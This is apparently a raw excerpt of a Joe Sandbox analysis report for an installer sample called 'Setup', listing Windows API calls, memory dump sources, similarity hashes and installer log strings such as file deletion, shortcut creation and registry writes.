• Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Setup.jbxd
Similarity
• API ID: Char$Next$CreateDirectoryPrev
• String ID:
• API String ID: 4115351271-0
• Opcode ID: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
• Instruction ID: 8ea1286759415c6f695425ed34242866ebe8a7a529327a4e56f2759b30593fc1
• Opcode Fuzzy Hash: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
• Instruction Fuzzy Hash: B1D0A921083C3221C562332A3D06FCF090C8F2635AB02C07BF841B61CA8B2C4B8240EE
APIs
• SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
Memory Dump Source
• Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Setup.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
• Instruction ID: 301fa2329b67e93c742f3c195cb428e9759bf169fd062939fd541a9b7e119014
• Opcode Fuzzy Hash: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
• Instruction Fuzzy Hash: D3C04C71650601AADA108B509D45F1677595B50B41F544439B641F50E0D674E450DA1E
APIs
• SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376
Memory Dump Source
• Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Setup.jbxd
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
APIs
• SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
Memory Dump Source
• Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Setup.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
APIs
• KiUserCallbackDispatcher.NTDLL(?,0040574D), ref: 00403D8F
Memory Dump Source
• Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Setup.jbxd
Similarity
• API ID: CallbackDispatcherUser
• String ID:
• API String ID: 2492992576-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003F9), ref: 00404993
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000408), ref: 004049A0
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
                                                                                                                                                                                                                                                                • LoadBitmapW.USER32(0000006E), ref: 00404A02
                                                                                                                                                                                                                                                                • SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
                                                                                                                                                                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
                                                                                                                                                                                                                                                                • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 00404A79
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
                                                                                                                                                                                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000005), ref: 00404BCF
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
                                                                                                                                                                                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 00404D9C
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 00404DAC
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
                                                                                                                                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000000), ref: 00404F49
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003FE), ref: 00404F54
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 00404F5B
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                                                                                • String ID: $ @$M$N
                                                                                                                                                                                                                                                                • API String ID: 1638840714-3479655940
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003F0), ref: 004044F9
                                                                                                                                                                                                                                                                • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003FB), ref: 00404527
                                                                                                                                                                                                                                                                • GetAsyncKeyState.USER32(00000010), ref: 0040452E
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003F0), ref: 00404543
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
                                                                                                                                                                                                                                                                • SetWindowTextW.USER32(?,?), ref: 00404583
                                                                                                                                                                                                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 0040463D
                                                                                                                                                                                                                                                                • lstrcmpiW.KERNEL32(00462540,00447240,00000000,?,?), ref: 0040467A
                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(?,00462540), ref: 00404686
                                                                                                                                                                                                                                                                • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
                                                                                                                                                                                                                                                                • CoTaskMemFree.OLE32(00000000), ref: 00404648
                                                                                                                                                                                                                                                                  • Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97
                                                                                                                                                                                                                                                                  • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                                                                                                                                                                                                                  • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                                                                                                                                                                                                                  • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                                                                                                                                                                                                                  • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                                                                                                                                                                                                                  • Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000,0046A560,004C70A8,install.log,00405A9C,004C70A8,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006), ref: 00403E8F
                                                                                                                                                                                                                                                                • GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
                                                                                                                                                                                                                                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774
                                                                                                                                                                                                                                                                  • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                                                                                                                                                                                • SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                                                                                                                                                                                                • String ID: 82D$@%F$@rD$A
                                                                                                                                                                                                                                                                • API String ID: 3347642858-1086125096
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                                                                                                                                                                                                                                • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
                                                                                                                                                                                                                                                                • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
                                                                                                                                                                                                                                                                • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
                                                                                                                                                                                                                                                                • lstrcmpA.KERNEL32(name,?), ref: 00406FC7
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 004071E6
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                                                                                                                                                                                                • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                                                                                                                                                                                                • API String ID: 1916479912-1189179171
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(0045C918,\*.*,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D09
                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(?,00408838,?,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D29
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 00406D2C
                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
                                                                                                                                                                                                                                                                • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
                                                                                                                                                                                                                                                                • FindClose.KERNEL32(?), ref: 00406E33
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • Delete: DeleteFile("%s"), xrefs: 00406DBC
                                                                                                                                                                                                                                                                • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
                                                                                                                                                                                                                                                                • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
                                                                                                                                                                                                                                                                • Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
                                                                                                                                                                                                                                                                • \*.*, xrefs: 00406D03
                                                                                                                                                                                                                                                                • RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
                                                                                                                                                                                                                                                                • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
                                                                                                                                                                                                                                                                • Delete: DeleteFile failed("%s"), xrefs: 00406DFD
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                                                                                • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
                                                                                                                                                                                                                                                                • API String ID: 2035342205-3294556389
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CoCreateInstance.OLE32(00409B24,?,00000001,00409B04,?), ref: 0040257E
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateInstance
                                                                                                                                                                                                                                                                • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                                                                                                                                                                                                • API String ID: 542301482-1377821865
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402E27
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FileFindFirst
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1974802433-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 004063CC
                                                                                                                                                                                                                                                                • GetVersionExW.KERNEL32(?), ref: 0040642A
                                                                                                                                                                                                                                                                  • Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031
                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 004064D4
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 004064DD
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                                                                                                                                                                                                • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 00404181
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
                                                                                                                                                                                                                                                                • GetSysColor.USER32(?), ref: 004041AF
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 004041D6
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2
                                                                                                                                                                                                                                                                  • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
                                                                                                                                                                                                                                                                  • Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
                                                                                                                                                                                                                                                                  • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,0000040A), ref: 0040424A
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000), ref: 00404251
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 0040427E
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
                                                                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 004042D2
                                                                                                                                                                                                                                                                • ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
                                                                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 004042F6
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                                                                                                                                                                                                • String ID: @%F$N$open
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • lstrcpyW.KERNEL32(0045B2C8,NUL,?,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AA9
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
                                                                                                                                                                                                                                                                • GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1
                                                                                                                                                                                                                                                                  • Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                                                                                                                                                                                                                                  • Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                                                                                                                                                                                                                                • GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
                                                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00406B4D
                                                                                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
                                                                                                                                                                                                                                                                • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
                                                                                                                                                                                                                                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
                                                                                                                                                                                                                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37
                                                                                                                                                                                                                                                                  • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                                                                                                                                                                                                                  • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00406C52
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00406C5C
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                                                                                                                                                                                                • String ID: F$%s=%s$NUL$[Rename]
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                                                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                                                                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                                                                                                                                                                                                • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 004010F6
                                                                                                                                                                                                                                                                • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                                                                                                                                                                                                • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                                                                                                                                                                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                                                                                                                                                                                                • DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
                                                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 0040116E
                                                                                                                                                                                                                                                                • EndPaint.USER32(?,?), ref: 00401177
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                                                                                • String ID: F
                                                                                                                                                                                                                                                                • API String ID: 941294808-1304234792
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                                                                                                                                                                                                • RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 004029E4
